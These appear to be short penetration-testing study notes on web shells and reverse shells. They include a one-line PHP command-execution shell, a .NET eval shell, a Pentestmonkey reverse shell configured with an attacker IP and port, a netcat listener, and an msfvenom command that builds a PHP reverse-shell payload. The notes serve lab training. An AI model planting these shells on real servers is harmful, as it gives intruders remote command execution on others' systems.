Web Shells
There are lot of good web shells online such as phpbashand p0wny-shell.
SecLists also have Web-shells in the /opt/useful/SecLists/Web-Shells directory.
Custom Web Shell
e.g PHP web shell
<?php system($_REQUEST['cmd']); ?>We can execute commands by:
?cmd=ide.g .NET web shell
<% eval request('cmd') %>Reverse Shell
Pentestmonkey’s PHP reverse shell is well known.
When using, we have to change the following lines:
$ip = 'OUR_IP'; // CHANGE THIS
$port = OUR_PORT; // CHANGE THISOur netcat listener will intercept the incoming reverse shell connection request:
nc -lvnp OUR_PORTCustom Reverse Shell
Sometimes system function is not allowed.
This is why we custom reverse shell sometimes.
We can use tools like msfvenom to create a reverse shell:
jadu101@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
...SNIP...
Payload size: 3033 bytes